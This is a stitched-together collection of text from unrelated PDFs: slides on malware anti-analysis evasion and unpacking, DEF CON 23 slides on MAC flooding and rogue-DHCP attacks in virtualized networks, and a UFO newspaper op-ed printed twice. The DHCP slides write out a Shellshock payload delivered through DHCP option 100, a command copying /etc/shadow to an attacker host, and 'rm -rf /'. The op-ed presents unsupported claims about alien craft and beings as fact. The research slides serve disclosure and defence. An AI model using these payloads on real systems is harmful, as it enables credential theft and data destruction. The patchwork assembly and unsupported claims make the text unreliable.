generic, but we may miss the parts that haven’t been executed during the test runs • Static: • analysis of the code and cleaning/resolving the obfuscated parts, reconstruction of the control flow – may be more accurate, but laborious, and requires different approach depending on a particular case The active approach: fingerprinting • Mostly related with the way code is designed: additional functions doing enviromnent fingerpriting to find artefacts indicating analysis • Post-compilation: using protectors with added antidebug/anti-VM layer, underground crypters specialized in AV/sandbox evasion • Most of the used methods are well-known, and the fact of using them can be relatively easily detected Anti-evasion • Approaches: • Sample-oriented: • Patching: finding the checks and removing them • Enviromnent oriented: • VM hardening: changing default settings, strings, that are commonly checked to identify VM • Using plugins for debuggers, specialized in hiding its presence (i.e. by overwriting values in PEB), changing default windows names • Using tools that are less often targeted by the checks: i.e. Intel Pin
pdf
Exploring Layer 2 Network Security in Virtualized Environments Ronny L. Bull & Jeanna N. Matthews Road Map © 2015 Ronny L. Bull - Clarkson University ● Context for the Problem of Layer 2 Network Security in Virrtualized Environments – Virtualization, Multi-tenant environments, Cloud services – Physical networking basics → Virtual networking basics ● Test platforms – Array of virtual networking implementations tested ● Specific attacks and results – MAC Flooding, DHCP Attacks – Mitigations ● Next steps and conclusions Virtualization Overview © 2015 Ronny L. Bull - Clarkson University Virtual Networking © 2015 Ronny L. Bull - Clarkson University Multi-Tenancy © 2015 Ronny L. Bull - Clarkson University What If? © 2014 Ronny L. Bull - Clarkson University Multi-Tenant Cloud Services © 2015 Ronny L. Bull - Clarkson University ● Amazon EC2 ● Microsoft Azure ● Google Cloud Services ● Countless fly by night VPS hosting providers online ● Brick and mortar data centers serving local clients ● Similarities – Most run some form of Xen (OS Xen, XenServer) – Some use VMWare or Hyper-V – All share network connectivity between tenants Key Question © 2015 Ronny L. Bull - Clarkson University ● Since all client virtual machines are essentially connected to a virtual version of a physical networking device, do Layer 2 network attacks that typically work on physical devices apply to their virtualized counterparts? ● Important question to explore: – All cloud services that rely on virtualized environments could be vulnerable – This includes data centers hosting mission critical or sensitive data! ● Not the only class of attacks from co-located VMs ● Old lesson: vulnerable to those close to you Bottom Line © 2015 Ronny L. Bull - Clarkson University ● Initial research experiments show that virtualized network devices DO have the potential to be exploited in the same manner as physical devices ● In fact some of these environments allow the attack to spill out of the virtualized network and affect the physical networks they are connected to! – MAC Flooding in Citrix XenServer ● Allows eavesdropping on physical network traffic as well as traffic on the virtual host Possible Attacks © 2015 Ronny L. Bull - Clarkson University ● What if another tenant can successfully launch a Layer 2 network attack within a multi-tenant environment? – Capture all network traffic – Redirect traffic – Perform Man-in-the-Middle attacks – Denial of Service – Gain unauthorized access to restricted sub-networks – Affect performance Quick Review of Network Basics © 2015 Ronny L. Bull - Clarkson University Bridging © 2015 Ronny L. Bull - Clarkson University ● Physical bridges connect two or more segments at Layer 2 – Separate collision domains – Maintain MAC address forwarding table for each segment – Forward requests based upon destination MAC addresses ● Do not cross bridge if destination is on same segment as source ● Cross if destination is on a different segment connected to the bridge Ethernet Frame © 2015 Ronny L. Bull - Clarkson University Preamble 8 Dest. Address 6 Source Address 6 Type / Length 2 Data ~ FCS 4 Preamble 8 Dest. Address 6 Used for Layer 2 Forwarding Bridging © 2015 Ronny L. Bull - Clarkson University Virtual Bridges © 2015 Ronny L. Bull - Clarkson University ● Simplest form of virtual networking ● Uses 802.1d Ethernet Bridging – Support built into Linux kernel and bridge-utils user-space package – Uses virtual TAP interfaces to connect virtual machines to virtual bridge (ie. tap0) ● User-space “Network Tap” ● Simulates a Layer 2 (link layer) network device Switching © 2015 Ronny L. Bull - Clarkson University ● Physical switches operate at Layer 2 or higher ● Multi-port bridges – Separate collision domains ● CAM Table – Content Addressable Memory – Similar to bridge forwarding table – Dynamic table that maps MAC addresses to ports – Allows switches to intelligently send traffic to connected devices – Check frame header for destination MAC and forward – Finite amount of memory! Switching © 2015 Ronny L. Bull - Clarkson University Example of switch's CAM table Mapping dest address to port Virtual Switches © 2015 Ronny L. Bull - Clarkson University ● Advanced form of virtual networking ● Can emulate Layer 2 and higher physical devices ● Virtual machines connect to vSwitch via virtual interfaces (ie. vif0) – Similar to tap devices ● Able to provide services such as – QoS – VLAN traffic separation – Performance & traffic monitoring Virtual Switches © 2015 Ronny L. Bull - Clarkson University ● Variety of virtual switches available – Typically bound to certain environments – Open vSwitch ● OS Xen, Citrix XenServer, KVM, Prox-Mox – Cisco Nexus 1000V Series ● VMWare vSphere, MS Hyper-V (add-on) – MS Hyper-V Virtual Switch ● Microsoft Hyper-V ● All are considered as enterprise level solutions Overview of Results ● MAC Flooding Attack ● Attack Overview ● Summary of Results ● DHCP Attack Scenarios ● Scenario Descriptions ● Summary of Results © 2015 Ronny L. Bull - Clarkson University Test Environment A.K.A. Cloud Security Research Lab © 2015 Ronny L. Bull - Clarkson University Hardware Specs © 2015 Ronny L. Bull - Clarkson University (full system specs are provided in the white paper on the DEFCON 23 CD) MAC Flooding Attack © 2015 Ronny L. Bull - Clarkson University MAC Flooding © 2015 Ronny L. Bull - Clarkson University ● MAC Flooding – Flood switch with numerous random MAC addresses to fill the CAM table buffer – Forces switch into fail safe mode (a.k.a. Hub mode) – All frames forwarded to all connected devices ● Breaks collision domain separation – Works well on most physical switches MAC Flooding © 2015 Ronny L. Bull - Clarkson University MAC Flooding Demo Network Diagram © 2015 Ronny L. Bull - Clarkson University MAC Flooding Demos © 2015 Ronny L. Bull - Clarkson University ● Demos – Gentoo / OS Xen – 802.1d Linux Bridging ● https://www.youtube.com/watch?v=Zh-aOy9gu9I – Gentoo / OS Xen – Open vSwitch 2.0.0 ● https://www.youtube.com/watch?v=gzuQI_XUgKc – Citrix XenServer 6.2 – Open vSwitch 1.4.6 ● https://www.youtube.com/watch?v=Y1JQg5YXfY4 MAC Flooding Summary © 2015 Ronny L. Bull - Clarkson University MAC Flooding (Performance Degradation) © 2015 Ronny L. Bull - Clarkson University MAC Flooding ● Reported Open vSwitch vulnerability to: ● cert.org ● Assigned VU#784996 ● cve-assign@mitre.org ● No response as of yet ● security@openvswitch.org ● Responded with implementation of MAC learning fairness patch ● Applied to all versions of Open vSwitch >= 2.0.0 ● https://github.com/openvswitch/ovs/commit/2577b9346b9b77feb94b34398b54b8f19fcff4bd © 2015 Ronny L. Bull - Clarkson University MAC Flooding Mitigation © 2015 Ronny L. Bull - Clarkson University ● Can be mitigated by enforcing port security on physical switches – Feature only currently available on Cisco Nexus 1000V 'Non-Free' version (VMWare Essentials Plus & MS Hyper-V) – Limit amount of MAC addresses that can be learned via a single port ● Only allow authorized MAC addresses to connect to a single port on the switch – Trusted connections, no malicious intent ● Disable unused switch ports DHCP Attacks © 2015 Ronny L. Bull - Clarkson University DHCP Protocol © 2015 Ronny L. Bull - Clarkson University ● Networking protocol used on most computer networks to automate the management of IP address allocation ● Also provides other information about the network to clients such as: – Subnet Mask – Default Gateway – DNS Servers – WINS Servers – TFTP Servers DHCP Protocol Client – Server Model © 2015 Ronny L. Bull - Clarkson University DHCP Options © 2015 Ronny L. Bull - Clarkson University ● DHCP allows an administrator to pass many options to a client besides the standard Subnet Mask, DNS, and Default Gateway information ● Options are specified by a DHCP Option Code number – Option 4 – Time Server – Option 15 – Domain Name – Option 35 – ARP Cache Timeout – Option 69 – SMTP Server ● Options are defined in RFC 2132 - DHCP Options – https://tools.ietf.org/html/rfc2132 DHCP Attacks © 2015 Ronny L. Bull - Clarkson University ● DHCP Attacks – Rogue DHCP server is placed on a network – Competes with legitimate DHCP server when responding to client addressing requests – 50/50 chance that a client will associate with malicious server since client requests are broadcast to the network ● Multiple rogue DHCP servers will reduce the odds! – Setting up a DHCP server on an existing system is very simple and can be completed in a matter of minutes DHCP Attacks Duplicate Addressing © 2015 Ronny L. Bull - Clarkson University ● Condition: – Two DHCP servers provide addresses to clients on the same network within the same range ● ie. 10.1.2.100 – 10.1.2.200 – High probability that duplicate addressing will occur ● First address allocated from each DHCP server will most likely be: 10.1.2.100 ● Then 10.1.2.101 … 102 … 103 ... etc ... DHCP Attacks Duplicate Addressing © 2015 Ronny L. Bull - Clarkson University ● Affect: – Denial of Service for the two clients that received the same address ● In conflict ● Services provided by those clients become inaccessible to other systems on the same network ● Client is unable to access resources on the network due to the conflict DHCP Attacks Duplicate Addressing © 2015 Ronny L. Bull - Clarkson University DHCP Attacks Rogue DNS Server © 2015 Ronny L. Bull - Clarkson University ● Condition: – A malicious DHCP server provides associated clients with the IP address of a poisoned DNS server – Poisoned DNS server is seeded with information that directs clients to spoofed websites or services ● Affect: – Client system is directed to malicious services that are intended to steal information or plant viruses, worms, maleware, or trojans on the system – PII or other sensitive information is harvested by the attacker DHCP Attacks Rogue DNS Server © 2015 Ronny L. Bull - Clarkson University DHCP Attacks Incorrect Default Gateway © 2015 Ronny L. Bull - Clarkson University ● Condition: – A malicious DCHP server provides the IP address of an incorrect default gateway for associated clients ● Affect: – Clients are unable to route traffic outside of their broadcast domain – Unable to access other resources on subnets or the Internet DHCP Attacks Malicious Honeynet © 2015 Ronny L. Bull - Clarkson University ● Condition: – A malicious DCHP server provides the IP address of an malicious default gateway for associated clients ● Affect: – Client traffic is routed to a malicious honeynet that the attacker setup in order to harvest PII or other sensitive information DHCP Attacks Malicious Honeynet © 2015 Ronny L. Bull - Clarkson University DHCP Attacks Remote Execution of Code © 2015 Ronny L. Bull - Clarkson University ● Condition: – By making use of certain DHCP options clients can be forced to run code or other commands while acquiring a DHCP lease ● Each time the lease is renewed the code will be executed, not just the initial time! – The BASH vulnerability ShellShock can be leveraged to remotely execute commands or run code on a vulnerable Linux or Mac OSX system DHCP Attacks Remote Execution of Code © 2015 Ronny L. Bull - Clarkson University ● Affect: – Remote commands or code executed on associated system with root privileges! ● Intent could be harmless to catastrophic: – Set the system banner: ● echo “Welcome to $HOSTNAME” > /etc/motd – Send the shadow file somewhere: ● scp /etc/shadow attacker@badguy.net:. – Delete all files and folders on the system recursively from / ● rm -rf / DHCP Attacks Remote Execution of Code © 2015 Ronny L. Bull - Clarkson University DHCP Attack Test Environment © 2015 Ronny L. Bull - Clarkson University ● The same test environment was used as in the previous MAC flooding experiment DHCP Attack Virtual Machines © 2015 Ronny L. Bull - Clarkson University ● However four new virtual machines were created in each platform to setup scenarios DHCP Attack Scenarios © 2015 Ronny L. Bull - Clarkson University ● Remote Execute of Code – The following command was passed with DHCP option 100: dhcp-option-force=100,() { :; }; /bin/echo 'Testing shellshock vulnerability. If you can read this it worked!'>/tmp/shellshock – The 'id' command was also passed to verify root privileges ● Poisoned DNS Server – The DHCP server was also configured as the poisoned DNS server directing clients to a malicious web server spoofing gmail.com, mail.google.com, and www.gmail.com DHCP Attack Scenarios © 2015 Ronny L. Bull - Clarkson University ● Invalid Default Gateway – Clients were passed a default gateway address of 1.1.1.1 instead of the valid 192.168.1.1 ● Malicious Default Gateway – Clients were passed a default gateway address of 192.168.1.20 which was a system configured as a simple router routing traffic to a malicious honeynet containing a web server Monitoring DHCP Traffic © 2015 Ronny L. Bull - Clarkson University Monitoring DHCP Traffic © 2015 Ronny L. Bull - Clarkson University 192.168.1.2 = Legitimate DHCP Server 192.168.1.3 = Rogue DHCP Server Legit Rogue Legit Rogue Monitoring DHCP Traffic © 2015 Ronny L. Bull - Clarkson University Shellshock ID Command Test © 2015 Ronny L. Bull - Clarkson University /etc/dnsmasq.conf entry on server: Output of dhclient on client: DHCP Attack Summary © 2015 Ronny L. Bull - Clarkson University DHCP Attack Demos © 2015 Ronny L. Bull - Clarkson University ● Poisoned DNS server – https://www.youtube.com/watch?v=XIH51udAZt0 ● Initial Shellshock test (write file to /tmp) – https://www.youtube.com/watch?v=K3ft-tt0N3M ● Shellshock exploit (full root access) – https://www.youtube.com/watch?v=ZdL_6XF1w3o DHCP Attack Mitigation © 2015 Ronny L. Bull - Clarkson University ● DHCP attacks can be mitigated by the following: ● Enforcing static IP addressing, DNS entries, and default gateways on every device – Cumbersome! – Prone to error ● Utilized DHCP snooping on switches – Option on some physical switches (Cisco, HP) – Restrict network access to specific MAC addresses connected to specific switch ports ● Highly restrictive! ● Prevents unauthorized DHCP servers DHCP Attack Mitigation © 2015 Ronny L. Bull - Clarkson University ● Use DHCP server authorization – Windows 2000 server and up – Feature of Active Directory and Windows DHCP servers ● Techniques using software defined networking (SDN) could be explored – Define filters to identify DHCP client requests on the broadcast domain and forward them to the correct server DHCP Attack Mitigation © 2015 Ronny L. Bull - Clarkson University ● SELinux Enabled (Default in CentOS & RedHat) – Seemed to have no affect on the majority of the attacks – Shellshock DHCP attack ● When enabled it did prevent us from writing to any directory that did not have 777 permissions. – Could write to /tmp & /var/tmp – Could not write to /root, /, /etc/, /home/xxx ● When disabled we could use the attack to write files anywhere on the system as the root user Looking Ahead VLAN Hopping Attacks © 2015 Ronny L. Bull - Clarkson University Next Step ● Next step: evaluate VLAN security in virtualized environments: ● All virtual switch products support the creation of VLANs ● VLANs allow service providers to logically separate and isolate multi-tenant virtual networks within their environments ● Do the current known vulnerabilities in commonly used VLAN protocols apply to virtualized networks? ● Could allow for: ● Eavesdropping of traffic on restricted VLANs ● Injection of packets onto a restricted VLAN ● DoS attacks ● Covert channels © 2015 Ronny L. Bull - Clarkson University Conclusion ● All Layer 2 vulnerabilities discussed were targeted towards the virtual networking devices not the hypervisors themselves ● Results show that virtual networking devices CAN be just as vulnerable as their physical counterparts ● Further research and experimentation is necessary to find out more similarities ● XenServer and any other solutions utilizing Open vSwitch are vulnerable to eavesdropping out of the box! ● All environments are vulnerable to manipulation via the DHCP protocol out of the box! © 2015 Ronny L. Bull - Clarkson University Conclusion © 2015 Ronny L. Bull - Clarkson University ● A single malicious virtual machine has the potential to sniff all traffic passing over a virtual switch – This can pass through the virtual switch and affect physically connected devices allowing traffic from other parts of the network to be sniffed as well! ● Significant threat to the confidentiality, integrity, and availability (CIA) of data passing over a network in a virtualized muli-tenant environment ● The results of the research presented today provide proof that a full assessment of Layer 2 network security in multi- tenant virtualized network environments is warranted Take-Away Actions © 2015 Ronny L. Bull - Clarkson University ● Users become empowered by understanding which virtual switch implementations are vulnerable to different Layer 2 network attacks – Educated users will question providers about their hosting environment – Audit the risk of workloads they run in the cloud or within multi-tenant virtualized environments – Consider extra security measures ● Increased use of encryption ● Service monitoring ● Threat detection and Alerting © 2015 Ronny L. Bull - Clarkson University ● Email: – bullrl@clarkson.edu – jnm@clarkson.edu ● The white paper and narrated video demos are available on the DEFCON 23 CD ● Special thanks to Nick Merante for helping to acquire the equipment needed to perform this research
pdf
After 35 years of serious investigation, exploration, and reflection, engaged with the best researchers in the field, it was time to make as succinct and clear a statement as I could, within the constraints of 1200 words for the Crossroads section in the Sunday Milwaukee Journal Sentinel. It was also a way for a mainstream newspaper, the winner of many awards, to implicitly suggest that the subject is more than tabloid fodder. http://www.jsonline.com/news/opinion/out-of-the-closet-on-ufos-b99203753z1- 245623181.htmlhttp://www.jsonline.com/news/opinion/out-of-the-closet-on-ufos- b99203753z1-245623181.html A Confession: Out of the Closet on UFOs - February 16 2014 Let me put it to you straight. For 35 years I have been exploring and investigating UFOs and UFOlogy (both the serious endeavor and the silly speculative fare that fills popular culture) and ... well, UFOs are real: They fly, they evince technologies we don’t understand, and they have been around for years. Above all, despite voluminous and overwhelming evidence to support those assertions, to raise this subject as worthy of historical and scientific investigation is to invite ridicule, the shaking of pitying heads, derision and hostility, and embarrassed silence. Still, I persist in believing, as Francis Bacon said in 1620, that if something deserves to exist, it deserves to be known, not rejected out of hand with prejudice. The scientific method, principles of historical analysis, and an open mind ask that much. No subject has been more marginalized and maligned than this topic. By “unidentified flying objects” I mean not the many things commonly mistaken for them – balloons, Venus, sprites, ball lightning, secret craft, etc.– I mean anomalous vehicles which for decades have been well documented by credible observers (“Credible people have seen incredible things,” said General John Samford, US Air Force Chief of Intelligence, in 1953), to which our government responded with the formulation and execution of policies in light of genuine national security concerns. I was recently privileged to be included as contributing editor and writer on a team that produced the book, “UFOs and Government: A Historical Inquiry” over five years. The research/writing team was led by Dr. Michael Swords, a professor of Natural Science (ret.) at Western Michigan University and Robert Powell, a nanotechnologist formerly with AMD. The book is regarded as an “exception” to the dreary field by CHOICE, the journal that recommends works for inclusion in university collections. CHOICE suggested that all university libraries should have it (to date, 45 have it in their collections, including 4 in the U-Wisconsin system, as well as many Wisconsin public libraries). The almost-600 page book is well grounded with nearly 1000 citations from government documents and other primary sources so it is “bullet proof.” There is virtually nothing speculative in it. We document the response of governments from the 1940s forward to events they took quite seriously—and which readers, judging on the evidence and data, will take seriously as well. A short column can not do justice to the complex narrative, but I can state a few facts. (1) Any other domain of inquiry with hundreds of well-documented events would be considered worthy of scientific and historical investigation. (2) Well-executed policies carried out with secrecy do not constitute “a conspiracy,” and we are not “conspiracy theorists,” a term used to denigrate investigators of unpopular subjects. Members of the military and intelligence community, from the early 1950s on, decided to learn as much as they could about UFOs – which they decided did not constitute a direct threat to national security – while at the same time playing down and dismissing reports from the public. The reports themselves were considered to be the primary threat by the CIA. (3) The data illuminates phenomena that is global, persistent, and sufficiently similar in small details to invite taxonomic classification as to vehicle types, the physics of force fields which power the objects and ionize the air around it, producing characteristic colors in relationship to speed and power, and diverse kinds of robotic or sentient beings associated with the objects. (4) It is an astonishing sociological and psychological event that throughout the twentieth century, reports by credible observers, corroborated on multiple radar sets on the ground and in jets, resulted not in public investigation but in an inability to get our minds around the mere possibility. Instead the subject is literally “unthinkable.” (5) One reason it is“unthinkable” is the effective use of ridicule, the mocking of people who made reports or took the subject seriously, and a long silence from official authoritative voices in the face of credible testimony. When I delivered a speech and served on a panel recently at the NSA, I was reminded by a veteran analyst that “the three legs of cover and deception are illusion, misdirection, and ridicule. But the greatest of these is ridicule”—which discredits the person, not the testimony, and the testimony I have heard has come from military and civilian pilots, astronauts, even the intelligence head of a foreign military force. “This is what I saw, and I know what I saw” is what I am told, corroborating the statement in 1947 by Lt. Gen. Nathan Twining that “The phenomena is something real and not visionary or fictitious.” (6) My personal exploration began in 1978 when, as a recently ordained Episcopal clergyman in a parish on the edge of an Air Force base, a parishioner, a decorated fighter pilot with all the “right stuff” who retired as a Colonel, told me, “We chase them and we can’t catch them.” (7) “UFOs and Government” includes quotations from generals, senior intelligence personnel, and professionals like Hermann Oberth, the father of German rocketry, that affirm the exotic characteristics of the technology that no earthly power could then achieve. As Apollo 14 astronaut Edgar Mitchell told me, “Richard, if we could do what they can do, they wouldn’t have sent me to the moon in a tin lizzie.” (8) We increasingly accept through our own scientific explorations that many earth- like planets likely to harbor life fill our galaxy and galaxies beyond. When we hear that from authoritative voices, we accept it as a probability, but when we examine the evidence of decades of visitation by real explorers, we find it difficult to think in a concrete way that we are not alone, not the top of the food chain, and that others may have been voyaging for thousands of years—as if we are the gold standard of scientific knowledge and our current understanding of physics is the end of all physics. So I’m out of the closet on a subject. As an older man with a solid track record of delivering insights into likely futures that have pretty much worked out over the years, a man who has spoken for security conferences all over the world (including NSA, the FBI, the Secret Service, the US Department of the Treasury, the Pentagon, etc.), discussing the impact of new technologies, I can say without embarrassment that documented data supports the contention that many historical reports show exactly what they seem to show –anomalous vehicular traffic demonstrating aerodynamic capabilities and propulsion systems beyond the range of our own technology. So ... why do well-intentioned people who know more than I do persist in the pretense that nothing unusual has been going on? That’s a more speculative exploration, one for another time. Richard Thieme is a Fox Point writer and professional speaker (www.thiemeworks.com). In addition to “UFOs and Government: A Historical Inquiry,” he has written “Islands in the Clickstream (2004)” and “Mind Games (2010)” and contributed chapters to several books. Sent on linked in – http://www.jsonline.com/news/opinion/out-of-the-closet-on-ufos-b99203753z1- 245623181.html Out of the Closet on UFOs - 2/16/14 Let me put it to you straight. For 35 years I have been exploring and investigating UFOs and UFOlogy (both the serious endeavor and the silly speculative fare that fills popular culture) and ... well, UFOs are real: They fly, they evince technologies we don’t understand, and they have been around for years. Above all, despite voluminous and overwhelming evidence to support those assertions, to raise this subject as worthy of historical and scientific investigation is to invite ridicule, the shaking of pitying heads, derision and hostility, and embarrassed silence. Still, I persist in believing, as Francis Bacon said in 1620, that if something deserves to exist, it deserves to be known, not rejected out of hand with prejudice. The scientific method, principles of historical analysis, and an open mind ask that much. No subject has been more marginalized and maligned than this topic. By “unidentified flying objects” I mean not the many things commonly mistaken for them – balloons, Venus, sprites, ball lightning, secret craft, etc.– I mean anomalous vehicles which for decades have been well documented by credible observers (“Credible people have seen incredible things,” said General John Samford, US Air Force Chief of Intelligence, in 1953), to which our government responded with the formulation and execution of policies in light of genuine national security concerns. I was recently privileged to be included as contributing editor/writer on a team that produced the book, “UFOs and Government: A Historical Inquiry” over 5 years. The research/writing team was led by Michael Swords, professor of Natural Science (ret.) at Western Michigan U and Robert Powell, a nanotechnologist formerly with AMD. The book is called an “exception” to the dreary field by CHOICE, the journal that recommends works for inclusion in university collections. CHOICE suggested that all university libraries should have it (to date, 45 have it in their collections). The 600 page book is well grounded with 1000 citations from govt documents and other primary sources so it is “bullet proof.” There is nothing speculative in it. We document the response of governments from the 1940s forward to events they took quite seriously— and which readers, judging on the evidence and data, will take seriously as well. A short column can not do justice to the complex narrative, but I can state a few facts. (1) Any other domain of inquiry with hundreds of well-documented events would be considered worthy of scientific and historical investigation. (2) Well-executed policies carried out with secrecy do not constitute “a conspiracy,” and we are not “conspiracy theorists,” a term used to denigrate investigators of unpopular subjects. Members of the military and intelligence community, from the early 1950s on, decided to learn as much as they could about UFOs – which they decided did not constitute a direct threat to national security – while at the same time playing down and dismissing reports from the public. The reports themselves were considered to be the primary threat by the CIA. (3) The data illuminates phenomena that is global, persistent, and sufficiently similar in small details to invite taxonomic classification as to vehicle types, the physics of force fields which power the objects and ionize the air around it, producing characteristic colors in relationship to speed and power, and diverse kinds of robotic or sentient beings associated with the objects. (4) It is an astonishing sociological and psychological event that throughout the twentieth century, reports by credible observers, corroborated on multiple radar sets on the ground and in jets, resulted not in public investigation but in an inability to get our minds around the mere possibility. Instead the subject is literally “unthinkable.” (5) One reason it is“unthinkable” is the effective use of ridicule, the mocking of people who made reports or took the subject seriously, and a long silence from official authoritative voices in the face of credible testimony. When I delivered a speech and served on a panel recently at the NSA, I was reminded by a veteran analyst that “the three legs of cover and deception are illusion, misdirection, and ridicule. But the greatest of these is ridicule”—which discredits the person, not the testimony, and the testimony I have heard has come from military and civilian pilots, astronauts, even the intelligence head of a foreign military force. “This is what I saw, and I know what I saw” is what I am told, corroborating the statement in 1947 by Lt. Gen. Nathan Twining that “The phenomena is something real and not visionary or fictitious.” (6) My personal exploration began in 1978 when, as a recently ordained Episcopal clergyman in a parish on the edge of an Air Force base, a parishioner, a decorated fighter pilot with all the “right stuff” who retired as a Colonel, told me, “We chase them and we can’t catch them.” (7) “UFOs and Government” includes quotations from generals, senior intelligence personnel, and professionals like Hermann Oberth, the father of German rocketry, that affirm the exotic characteristics of the technology that no earthly power could then achieve. As Apollo 14 astronaut Edgar Mitchell told me, “Richard, if we could do what they can do, they wouldn’t have sent me to the moon in a tin lizzie.” (8) We increasingly accept through our own scientific explorations that many earth- like planets likely to harbor life fill our galaxy and galaxies beyond. When we hear that from authoritative voices, we accept it as a probability, but when we examine the evidence of decades of visitation by real explorers, we find it difficult to think in a concrete way that we are not alone, not the top of the food chain, and that others may have been voyaging for thousands of years—as if we are the gold standard of scientific knowledge and our current understanding of physics is the end of all physics. So I’m out of the closet on a subject. As an older man with a solid track record of delivering insights into likely futures that have pretty much worked out over the years, a man who has spoken for security conferences all over the world (including NSA, the FBI, the Secret Service, the US Department of the Treasury, the Pentagon, etc.), discussing the impact of new technologies, I can say without embarrassment that documented data supports the contention that many historical reports show exactly what they seem to show –anomalous vehicular traffic demonstrating aerodynamic capabilities and propulsion systems beyond the range of our own technology. So ... why do well-intentioned people who know more persist in the pretense that nothing unusual has been going on? That’s a speculative exploration, one for another time.
pdf
Covert Debugging Circumventing Software Armoring Techniques Offensive Computing, LLC Danny Quist Valsmith dquist@offensivecomputing.net valsmith@offensivecomputing.net Offensive Computing - Malware Intelligence Danny Quist • Offensive Computing, Cofounder • PhD Student at New Mexico Tech • Reverse Engineer • Exploit Development • cDc/NSF Offensive Computing - Malware Intelligence Valsmith • Offensive Computing, Cofounder • Malware Analyst/Reverse Engineer • Metasploit Contributor • Penetration Tester/Exploit developer • cDc/NSF Offensive Computing - Malware Intelligence Offensive Computing, LLC • Community Contributions – Free access to malware samples – Largest open malware site on the Internet – 350k hits per month • Business Services – Customized malware analysis – Large malware data-mining / access – Reverse Engineering Offensive Computing - Malware Intelligence Introduction • Debugging Malware is a powerful tool – Trace Runtime Performance – Monitor API Calls – Dynamic Analysis == Automation • Malware is getting good at preventing it – Debugger Detection – VM Detection – Legitimate Software Pioneered these Techniques Offensive Computing - Malware Intelligence Overview of Talk • Software Armoring Techniques • Covert Debugging Requirements • Dynamic Instrumentation for Debugging • OS Pagefault Assisted Covert Debugging • Application – Generic Autounpacking • Results Offensive Computing - Malware Intelligence Software Armoring • Packing/Encryption • VM Detection • SEH Tricks • Debugger Detection • Shifting Decode Frame • Example: Microsoft’s Patchguard Offensive Computing - Malware Intelligence Packing/Encryption • Self-modifying Code – Small Decoder Stub – Decompresses the main executable – Restores imports • Play Tricks with Portable Executables – Hide the Imports – Obscure relocations – Encrypt/compress the executable Offensive Computing - Malware Intelligence Normal PE File Offensive Computing - Malware Intelligence Packed PE File Offensive Computing - Malware Intelligence Virtual Machine Detection • Single instruction detection – SLDT, SGDT, SIDT – See: Redpill, Scoopy-Doo, OCVmdetect • Instructions for Privileged/Unprivileged CPU mode – VMs try to be efficient, some instructions insecure – Do not fully emulate x86 bug for bug Offensive Computing - Malware Intelligence Debugger Detection • Windows API – IsDebuggerPresent() API call – Checks PEB for magic bit (EFLAGS) – Bit toggling works • Timing Attacks – Issue RDTSC instruction, compare to known values – Amazingly effective Offensive Computing - Malware Intelligence Debugger Detection (cont.) • Breakpoint Detection – Int3 (0xCC) Instruction Scanning – Checksumming of executable • Hardware Debugging Detection – Check CPU Flags for debug bit • SoftICE Detection – Modification of Int3 Scanning Offensive Computing - Malware Intelligence SEH Tricks • Structured Exception Handler • Used to handle error in running code • Malware will overload this function to unpack code • Debugger thinks SEH exceptions are for it • Debugger dies Offensive Computing - Malware Intelligence Shifting Decode Frames • Execution is split at the basic block level • Block is decoded, executed, and then encoded again • Hard to defeat! • Implemented in Patchguard for Vista 64 and Windows Server 2003 64-bit Offensive Computing - Malware Intelligence So What? • These are all variations on a theme • There should be a generic way to debug • Need to modify at a fundamental level • Solution should be: – Generic – Work across set of executables – Efficient – Good performance for non-debug – Undetectable (as much as possible) – Extensible – Automation is the key Offensive Computing - Malware Intelligence Software Armoring Achilles Heel If it executes, it can be unpacked. [http://www.security-assessment.com/files/presentations/Ruxcon_2006_-_Unpacking_Virus,_Trojans_and_Worms.pdf] Offensive Computing - Malware Intelligence Unpacking • How an Unpacker Works: – Writes to an area of memory (decode) – Memory is read from (execute) – More writes to memory (optional re-encoding) • CPU Only Executes Machine Code • This process can be monitored • Unpacking is directly related to timing – At some point, it must be unpacked Offensive Computing - Malware Intelligence Manual Unpacking Process • Consists of several stages – Identify Packer Type – Find OEP or get process to unpacked state in memory – Dump process memory to file – Fixup file / rebuild Import Address Table (IAT) – Ensure file can now be analyzed Offensive Computing - Malware Intelligence Manual Unpacking Process • Several methods to identify packer type – Peid – Msfpecan / OffensiveComputing.net – Manually look at section names – Other packer scanners like • Protection-id • Pe-scan Offensive Computing - Malware Intelligence Manual Unpacking Process Offensive Computing - Malware Intelligence Manual Unpacking Process • Methods to find OEP / unpacked memory – OllyScripts • http://www.tuts4you.com • http://www.openrce.org – OEP finder tools • OEP finders for specific packers • OEP Finder (very limited) • PE Tools / LordPe • PEiD generic OEP finder Offensive Computing - Malware Intelligence Manual Unpacking Process Offensive Computing - Malware Intelligence Manual Unpacking Process – Dump process memory to file • OllyDump • LordPE • Custom tools – Example: void DumpProcMem(unsigned int ImageBase, unsigned int ImageSize,LPSTR filename, LPSTR pid) { SIZE_T ReadBytes = 0; SIZE_T WriteBytes = 0; unsigned char * buffer = (unsigned char *) calloc(ImageSize, 1); HANDLE hProcess = OpenProcess(PROCESS_VM_READ, FALSE, (DWORD)atoi(pid)); ReadProcessMemory(hProcess, (LPCVOID) ImageBase, buffer, ImageSize, &ReadBytes); HANDLE hFile = CreateFile(TEXT("oc_dumped_image.exe"), GENERIC_READ|GENERIC_WRITE, 0, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); WriteFile(hFile, buffer, ImageSize, &WriteBytes, NULL); Offensive Computing - Malware Intelligence Manual Unpacking Process Offensive Computing - Malware Intelligence Manual Unpacking Process – Fixup file / rebuild Import Address Table (IAT) • ImportRec probably best tool • Revirgin by +Tsehp • Manually with a hex editor (tedious) – IAT contains list of functions imported • Very useful for understanding capabilities Offensive Computing - Malware Intelligence Manual Unpacking Process Offensive Computing - Malware Intelligence Manual Unpacking Process • Ensure file can now be analyzed • Clean disassembly should be available • IAT should be visible • Functions should be found • Strings clear and useful • Manual unpacking process can be tedious • Hardest part is generally finding the OEP Offensive Computing - Malware Intelligence Manual Unpacking Process Offensive Computing - Malware Intelligence Unpacking: The Algorithm • Track written memory • If that memory is executed, it’s unpacked • Must monitor: – Memory writes – Memory Executions • Break on execute useful here • Automate the process Offensive Computing - Malware Intelligence Dynamic Instrumentation • Allows a running process to be monitored • Intel PIN – Uses Just-In-Time compiler to insert analysis code – Retains consistency of executable – Pintools – Use API to analyze code – Good control of execution • Instruction • Memory access • Basic block – Process Attaching / Detaching Offensive Computing - Malware Intelligence Dynamic Instrumentation • Instruction tracing for the following packers – Armadillo – Aspack – FSG – MEW – PECompact – Telock – UPX • Created Simple Hello World Application • Graphed results with Oreas GDE Offensive Computing - Malware Intelligence Results Aspack 2.12 Offensive Computing - Malware Intelligence Results • Unpacking loop is easy to find Offensive Computing - Malware Intelligence 